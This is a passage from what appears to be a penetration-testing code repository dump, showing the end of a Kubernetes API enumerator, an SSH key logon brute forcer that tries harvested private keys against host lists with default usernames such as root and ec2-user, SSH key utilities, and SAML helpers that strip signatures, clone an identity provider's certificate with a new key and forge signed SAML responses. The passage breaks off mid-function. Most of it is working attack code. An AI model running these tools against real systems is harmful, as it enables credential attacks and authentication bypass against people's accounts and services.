and key)') 128 | sys.exit(1) 129 | 130 | if args.clientcert and not args.clientkey: 131 | print('Provide a key file to use with the client certificate "{}"'.format(args.clientcert)) 132 | sys.exit(1) 133 | 134 | 135 | outputfile = args.output if args.output else '{}_{}_Kubernetes_API.json'.format(datetime.now().strftime('%Y%m%d%H%M%S'), args.server.replace(':', '_')) 136 | 137 | enumerator = APIEnumerator(args.server, logger=logger, clientcert=args.clientcert, clientkey=args.clientkey, token=args.token, apiextract=args.noapiextract) 138 | enumerator.enum() 139 | open(outputfile, 'w').write(json.dumps(enumerator.output, indent=4)) 140 | logger.warning('Wrote output file {}'.format(outputfile)) 141 | 142 | 143 | 144 | if __name__ == "__main__": 145 | # execute only if run as a script, helpful if script needs to be debugged 146 | 147 | if not check_ipython(): 148 | command_line() -------------------------------------------------------------------------------- /utilities/ssh_bruteforcer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import paramiko 4 | import glob 5 | import time 6 | import sys 7 | import argparse 8 | 9 | 10 | 11 | class MyParser(argparse.ArgumentParser): 12 | def error(self, message): 13 | sys.stderr.write('error: %s\n' % message) 14 | self.print_help() 15 | sys.exit(2) 16 | 17 | 18 | 19 | def try_connect(host, username, key_file, timeout=1, port=22) -> str: 20 | client = paramiko.client.SSHClient() 21 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 22 | connect_params = {'port': port, 'username': username, 'timeout': timeout, 'banner_timeout': timeout} 23 | #kfd = open(key_file).read() 24 | #if kfd.startswith('-----BEGIN OPENSSH') or kfd.startswith('-----BEGIN RSA') or kfd.startswith('-----BEGIN EC'): 25 | try: 26 | connect_params['pkey'] = paramiko.RSAKey.from_path(key_file) 27 | except paramiko.SSHException as e: 28 | if 'not a valid' in str(e): 29 | return 'BAD_KEY' 30 | elif 'Invalid key curve identifier' in str(e): 31 | return 'BAD_KEY' 32 | else: 33 | raise paramiko.SSHException(e) 34 | except ValueError as e: 35 | if 'Could not deserialize key data.' in str(e): 36 | return 'PASSWORD_REQUIRED' 37 | else: 38 | raise ValueError(e) 39 | except: 40 | return 'BAD_KEY' 41 | #else: 42 | # connect_params['key_filename'] = key_file 43 | 44 | try: 45 | client.connect(host, **connect_params) # banner_timeout=None, auth_timeout=None, channel_timeout=None 46 | except ValueError as e: 47 | client.close() 48 | if 'q must be exactly 160, 224, or 256 bits long' in str(e): 49 | return 'BAD_KEY' 50 | else: 51 | raise ValueError(e) 52 | except paramiko.AuthenticationException: 53 | client.close() 54 | return 'FAILED' 55 | except paramiko.PasswordRequiredException as e: 56 | client.close() 57 | if 'Private key file is encrypted' in str(e): 58 | return 'PASSWORD_REQUIRED' 59 | else: 60 | raise paramiko.PasswordRequiredException(e) 61 | except OSError as e: 62 | client.close() 63 | if 'Host is down' in str(e): 64 | return 'HOST_DOWN' 65 | elif 'Unable to connect to port 22' in str(e): 66 | return 'NO_SSH' 67 | else: 68 | raise OSError(e) 69 | 70 | except Exception as e: 71 | client.close() 72 | if 'q must be exactly 160, 224, or 256 bits long' in str(e): 73 | return 'BAD_KEY' 74 | else: 75 | raise Exception(e) 76 | client.close() 77 | return 'SUCCESS' 78 | 79 | 80 | 81 | if __name__ == "__main__": 82 | parser = MyParser() 83 | #parser.epilog = 'Text to include after help output' 84 | parser.description = 'SSH key logon brute forcer' 85 | parser.add_argument('-t', '--targets', type=str, required=True, help='File with newline sperated SSH hosts to target for logons, use host:port for non default SSH port. REQUIRED.') 86 | parser.add_argument('-k', '--keyglob', type=str, required=True, help='Glob pattern to match keyfiles to use for logon, e.g. /tmp/*.pem. REQUIRED') 87 | parser.add_argument('-o', '--output', type=str, required=True, help='Filename for output. REQUIRED') 88 | parser.add_argument('-u', '--users', type=str, help='File with usernames to use for logons, otherwise a default set of usernames will be attempted') 89 | parser.add_argument('-x', '--timeout', type=int, default=5, help='Conection timeout in seconds') 90 | parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Verbose output') 91 | args = parser.parse_args() 92 | 93 | 94 | hostfile = args.targets 95 | hosts = [a for a in open(hostfile).read().split('\n') if a] 96 | if args.users: 97 | userfile = args.users 98 | users = [a for a in open(userfile).read().split('\n') if a] 99 | else: 100 | users = ['ec2-user', 'ubuntu', 'root', 'admin', 'user'] 101 | 102 | timeout = args.timeout 103 | verbose = args.verbose 104 | outputfile = args.output 105 | keypattern = args.keyglob 106 | 107 | 108 | default_port=22 109 | sleep = 0.5 # TODO: expose 110 | 111 | 112 | keys = glob.glob(keypattern) 113 | 114 | skip_keys = [] 115 | skip_hosts = [] 116 | success_count = 0 117 | 118 | oh = open(outputfile, 'w') 119 | for key in [a for a in keys]: 120 | usable_key = True 121 | for user in users: 122 | if usable_key: 123 | for host in [a for a in hosts if a not in skip_hosts]: 124 | if usable_key: 125 | if verbose: 126 | print(f'Trying {host};{user};{key}') 127 | hnp = host.split(':') 128 | if len(hnp) > 1: 129 | host = hnp[0] 130 | port = hnp[1] 131 | else: 132 | port = default_port 133 | try: 134 | result = try_connect(host, user, key, port=port, timeout=timeout) 135 | if result == 'PASSWORD_REQUIRED': 136 | if verbose: 137 | print(f'Key {key} requires a password') 138 | usable_key = False 139 | if result == 'BAD_KEY': 140 | if verbose: 141 | print(f'Key {key} is bad') 142 | usable_key = False 143 | if result == 'HOST_DOWN': 144 | if verbose: 145 | print(f'Host {host} is down') 146 | skip_hosts.append(host) 147 | if result == 'NO_SSH': 148 | if verbose: 149 | print(f'Host {host} is not running ssh on port {port}') 150 | skip_hosts.append(host) 151 | if result == 'SUCCESS': 152 | success_count += 1 153 | if verbose: 154 | print(f'SUCCESS:{host};{user};{key}') 155 | oh.write(f'SUCCESS:{host};{user};{key}\n') 156 | oh.flush() 157 | 158 | except Exception as e: 159 | if verbose: 160 | print(f'EXCEPTION:{host};{user};{key};{str(e)}') 161 | oh.write(f'EXCEPTION:{host};{user};{key};{str(e)}\n') 162 | time.sleep(sleep) 163 | 164 | oh.close() 165 | 166 | print(f'Completed. Found {success_count} successful credential pairs. Output written to {outputfile}') 167 | -------------------------------------------------------------------------------- /utilities/ssh_cert_utilities.py: -------------------------------------------------------------------------------- 1 | from pyasn1.type import univ 2 | from pyasn1.codec.der import encoder as der_encoder, decoder as der_decoder 3 | from OpenSSL import crypto 4 | import sys 5 | import struct 6 | import base64 7 | 8 | 9 | # modifed from the below and updated to support python 2 and 3 10 | #https://gist.github.com/thwarted/1024558 11 | def ssh_pub_to_pem(key): 12 | 13 | keydata = base64.b64decode(key.split(' ')[1]) 14 | 15 | if sys.version_info.major == 2: 16 | bc = lambda x: ord(x) 17 | else: 18 | bc = lambda x: x 19 | 20 | parts = [] 21 | while keydata: 22 | # read the length of the data 23 | dlen = struct.unpack('>I', keydata[:4])[0] 24 | 25 | # read in bytes 26 | data, keydata = keydata[4:dlen+4], keydata[4+dlen:] 27 | 28 | parts.append(data) 29 | 30 | numberfy = lambda x : sum([a[0] << a[1] for a in zip([bc(a) for a in x], [a*8 for a in range(0, len(x))[::-1]] )]) 31 | 32 | # get the numeric value of the bytes in big endian order 33 | e_val = numberfy(parts[1]) 34 | n_val = numberfy(parts[2]) 35 | 36 | bitstring = univ.Sequence() 37 | bitstring.setComponentByPosition(0, univ.Integer(n_val)) 38 | bitstring.setComponentByPosition(1, univ.Integer(e_val)) 39 | 40 | bitstring1 = der_encoder.encode(bitstring) 41 | 42 | # turn into a big binary string 43 | bitstring2 = ''.join([format(bc(x), '08b') for x in bitstring1]) 44 | 45 | 46 | bitstring3 = univ.BitString("'%s'B" % bitstring2) 47 | 48 | pubkeyid = univ.Sequence() 49 | pubkeyid.setComponentByPosition(0, univ.ObjectIdentifier('1.2.840.113549.1.1.1')) # == OID for rsaEncryption 50 | pubkeyid.setComponentByPosition(1, univ.Null('')) 51 | 52 | pubkey_seq = univ.Sequence() 53 | pubkey_seq.setComponentByPosition(0, pubkeyid) 54 | pubkey_seq.setComponentByPosition(1, bitstring3) 55 | 56 | encoded = base64.b64encode(der_encoder.encode(pubkey_seq)).decode('utf8') 57 | return "-----BEGIN PUBLIC KEY-----\n" + '\n'.join([encoded[a:a+64] for a in range(0, len(encoded), 64)]) + '\n-----END PUBLIC KEY-----\n' 58 | 59 | 60 | 61 | def match_ssh_keypair(id_rsa_priv_pem, id_rsa_pub_ssh): 62 | '''Return True if provided private key in PEM format and public key in ssh-rsa format match''' 63 | if not isinstance(id_rsa_pub_ssh, str) or not id_rsa_pub_ssh.startswith('ssh-rsa '): 64 | return 'Provide public key in ssh public key string format' 65 | if not isinstance(id_rsa_priv_pem, str) or not len([a for a in id_rsa_priv_pem.split('\n') if 'PRIVATE KEY' in a]) == 2: 66 | return 'Provide private key in RSA PEM format' 67 | 68 | private = crypto.load_privatekey(crypto.FILETYPE_PEM, id_rsa_priv_pem) 69 | #public_base = base64.b64decode(id_rsa_pub_ssh.split(' ')[1]) 70 | 71 | return ''.join([a for a in crypto.dump_publickey(crypto.FILETYPE_PEM, private).decode('utf-8').split('\n') if a and '--' not in a]) == ''.join([ a for a in ssh_pub_to_pem(id_rsa_pub_ssh).split('\n') if '--' not in a]) 72 | 73 | 74 | 75 | def pem_key_details(key): 76 | '''Given a key in PEM format, provides details about the key''' 77 | mk = crypto.load_publickey(crypto.FILETYPE_PEM, key) 78 | ck = mk.to_cryptography_key() 79 | return {'bits' : mk.bits(), 'e' : ck.public_numbers().e, 'n' : ck.public_numbers().n, 'type' : {getattr(crypto, a): a.replace('TYPE_', '') for a in dir(crypto) if a.startswith('TYPE_')}[mk.type()] } 80 | -------------------------------------------------------------------------------- /utilities/sso-helpers.py: -------------------------------------------------------------------------------- 1 | import base64 2 | from urllib.parse import unquote, quote 3 | from lxml import etree 4 | from lxml.etree import tostring 5 | from signxml import XMLSigner, XMLVerifier 6 | import signxml 7 | from OpenSSL import crypto 8 | from cryptography.hazmat.primitives import serialization 9 | import sys 10 | 11 | 12 | placeholder = '' 13 | 14 | def web64_encode(val): 15 | return base64.urlsafe_b64encode(val).replace(b'=', b'') 16 | 17 | 18 | def web64_decode(val): 19 | return base64.urlsafe_b64decode(val + '=' *(4-(len(val)%4))) 20 | 21 | 22 | def decode_saml(raw_saml): 23 | return base64.b64decode(unquote(raw_saml)) 24 | 25 | def encode_saml(xml_text): 26 | return quote(base64.b64encode(xml_text)) 27 | 28 | 29 | def get_saml_cert(saml): 30 | return etree.ElementTree(etree.fromstring(saml)).xpath("//*[local-name()='X509Certificate']")[0].text 31 | 32 | def get_saml_cert_raw(raw_saml): 33 | return get_saml_cert(decode_saml(raw_saml)) 34 | 35 | 36 | def get_signed_ref(saml): 37 | return etree.ElementTree(etree.fromstring(saml)).xpath("//*[local-name()='Reference']")[0].get('URI').lstrip('#') 38 | 39 | 40 | 41 | def get_signed_ref_raw(raw_saml): 42 | return get_signed_ref(decode_saml(raw_saml)) 43 | 44 | 45 | 46 | def string_to_xml(xml_string): 47 | return etree.ElementTree(etree.fromstring(xml_string)) 48 | 49 | 50 | def verify_saml(saml): 51 | '''Returns signed xml, exception if signature invalid''' 52 | cert = get_saml_cert(saml) 53 | return XMLVerifier().verify(saml, x509_cert=cert).signed_data 54 | 55 | 56 | def verify_saml_raw(raw_saml): 57 | '''Returns signed xml, exception if signature invalid''' 58 | cert = get_saml_cert_raw(raw_saml) 59 | return XMLVerifier().verify(base64.b64decode(unquote(raw_saml)), x509_cert=cert).signed_data 60 | 61 | 62 | def sign_saml(xml_root, key, cert, reference, mode='normal', c14n='http://www.w3.org/2001/10/xml-exc-c14n#'): 63 | if mode == 'microsoft': 64 | return tostring(XMLSigner(method=signxml.methods.enveloped, c14n_algorithm=c14n, namespaces={None:'http://www.w3.org/2000/09/xmldsig#'}).sign(xml_root, key=key, cert=cert, reference_uri=reference) ) 65 | else: 66 | return tostring(XMLSigner(method=signxml.methods.enveloped, c14n_algorithm=c14n).sign(xml_root, key=key, cert=cert, reference_uri=reference) ) 67 | 68 | 69 | def strip_signature(raw_saml, placeholder=placeholder): 70 | x = string_to_xml(decode_saml(raw_saml)) 71 | n = x.xpath(".//*[local-name()='Signature']")[0] 72 | p = n.getparent() 73 | p.replace(n, etree.fromstring(placeholder)) 74 | return tostring(x) 75 | 76 | 77 | 78 | 79 | def copy_cert(saml_cert): 80 | x509 = crypto.load_certificate(crypto.FILETYPE_ASN1, base64.b64decode(saml_cert)) 81 | 82 | # Creating key 83 | k = crypto.PKey() 84 | k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits())) 85 | cert = crypto.X509() 86 | 87 | # Setting cert details from the original certificate 88 | cert.set_version(x509.get_version()) 89 | cert.set_serial_number(x509.get_serial_number()) 90 | cert.set_subject(x509.get_subject()) 91 | cert.set_issuer(x509.get_issuer()) 92 | cert.set_notBefore(x509.get_notBefore()) 93 | cert.set_notAfter(x509.get_notAfter()) 94 | cert.set_pubkey(k) 95 | key1 = k.to_cryptography_key() 96 | 97 | # add extensions 98 | cert.add_extensions([x509.get_extension(a) for a in range(0, x509.get_extension_count())]) 99 | 100 | sig = x509.get_signature_algorithm().decode('ascii') 101 | if 'WithRSAEncryption' not in sig: 102 | raise Exception('Error: RSA not used to sign cert --- what??. Signature algorithm: %s' %(sig)) 103 | cert.sign(k, sig.replace('WithRSAEncryption', '')) 104 | 105 | # Private key in traditional RSA PEM format - for SAML Raider import 106 | trsa = key1.private_bytes(encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption()) 107 | 108 | # PFX file format 109 | pfx = crypto.PKCS12() 110 | pfx.set_privatekey(k) 111 | pfx.set_certificate(cert) 112 | pfxdata = pfx.export() 113 | pfxdata_pwd = pfx.export(passphrase=b'password') # for burp 114 | 115 | return { 116 | 'cert' : crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 117 | 'key' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'), 118 | 'pub' : crypto.dump_publickey(crypto.FILETYPE_PEM, k).decode('utf-8'), 119 | 'asn1_der_cert' : crypto.dump_certificate(crypto.FILETYPE_ASN1, cert), 120 | 'asn1_der_key' : crypto.dump_privatekey(crypto.FILETYPE_ASN1, k), 121 | 'asn1_der_pub' : crypto.dump_publickey(crypto.FILETYPE_ASN1, k), 122 | 'trad_rsa' : trsa, 123 | 'pfx' : pfxdata, 124 | 'pfx_password' : pfxdata_pwd, 125 | 'socat' : crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8')+crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'), 126 | 'crypto' : crypto 127 | } 128 | 129 | 130 | 131 | # key is private key in PEM format with file headers 132 | # cert is in PEM format with file headers 133 | def forge_saml_response(raw_saml, key=None, cert=None): 134 | try: 135 | verify_saml_raw(raw_saml) 136 | except: 137 | print('Input SAML is not properly signed, but maybe you edited it?') 138 | real_cert = get_saml_cert_raw(raw_saml) 139 | if not key or not cert: 140 | fake_cert = copy_cert(real_cert) 141 | key = fake_cert['key'] 142 | cert = fake_cert['cert'] 143 | ref = get_signed_ref_raw(raw_saml) 144 | base = strip_signature(raw_saml) 145 | base_xml = string_to_xml(base) 146 | mode = 'normal' 147 | if '